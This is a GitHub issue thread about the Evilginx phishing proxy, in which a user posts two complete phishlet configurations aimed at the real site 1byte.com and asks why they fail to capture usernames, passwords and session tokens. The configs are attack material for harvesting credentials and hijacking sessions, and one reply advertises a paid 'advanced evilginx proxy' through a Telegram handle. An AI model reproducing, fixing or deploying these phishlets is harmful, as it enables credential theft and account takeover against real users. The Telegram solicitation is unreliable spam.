Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Evilginx ver 3.3.0 cannot capture credentials #1109

Open
alasalamont opened this issue Sep 17, 2024 · 2 comments
Open

Evilginx ver 3.3.0 cannot capture credentials #1109

alasalamont opened this issue Sep 17, 2024 · 2 comments

Comments

@alasalamont
Copy link

alasalamont commented Sep 17, 2024

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hi all,
I am using Evilginx 3.3.0 and testing for this domain 1byte.com. But cannot catch the credentials

  • Here is the POST request. The site use json format therefore the type at credentials must be json
    image

  • Here is the cookies stored on browser. The needed-cookies are auth._token_expiration.local and auth._token.local
    image

  • I did try test regular expression for catching the value of username + password. It works
    image

  • And here is my 1st phishlet, did not work :(

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['auth.token_expiration.local:always', 'auth._token.local:always']
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'
  • For the second phishlet, I specified all the domains correctly, but I encountered an issue with setting the value of auth_urls. The landing page is 1byte.com, but after logging in, the user dashboard uses bo.1byte.com and the content is retrieved from api.1byte.com. Since I set 1byte.com as the landing page in the proxy host, there's no way to instruct Evilginx to check api.1byte.com using the auth_urls after the login.
min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['.*:regexp']
  - domain: '1byte.com'
    keys: ['.*:regexp']  
  - domain: '.api.1byte.com'
    keys: ['.*:regexp']
  - domain: 'api.1byte.com'
    keys: ['.*:regexp']
auth_urls:
  - '/'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

Another option is to inject JavaScript to capture what the user inputs, but that's not what I'm aiming for. I just want to know if the way I've built the phishlet is correct or not. If it's wrong, where exactly is the issue? Or are there certain cases where Evilginx can't capture credentials without injecting JavaScript?

Thanks!!!

@iliwasel
Copy link

iliwasel commented Oct 2, 2024

I am trying to reproduce your issue but how did you manage to get evilginx and burp suite work together?
I get Cannot read TLS response from mitm'd server proxyconnect tcp: EOF

@heisdelly2
Copy link

Message me on TG @big_elon7 for an advanced evilginx proxy that fixes all these

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants
@iliwasel @alasalamont @heisdelly2 and others